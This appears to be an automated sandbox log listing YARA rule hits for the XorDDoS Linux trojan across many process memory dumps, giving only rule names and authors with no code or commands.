Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
